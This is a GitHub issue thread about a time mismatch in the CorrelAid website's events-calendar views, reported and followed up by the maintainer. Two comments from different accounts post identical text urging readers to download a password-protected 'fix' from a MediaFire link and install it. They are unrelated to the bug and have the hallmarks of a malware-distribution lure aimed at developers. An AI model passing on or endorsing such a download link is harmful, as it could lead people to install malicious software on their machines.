### ISSUE TITLE
Events Calendar Week View: Fix time

### ISSUE THREAD

**Issue by jstet** [CorrelAid/correlaid_website#789]
Time differs from week view  to detail view

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jstet** [comment]
Still not fixed, time diverged even more

**Comment by jstet** [comment]
https://www.correlaid.org/veranstaltungen/correlaidx-meetup-rheinmain/?calendarView=dayGridMonth&containsDate=2024-08-07&viewType=calendar meetup rhein main is also wrong in month view, because it spans two days
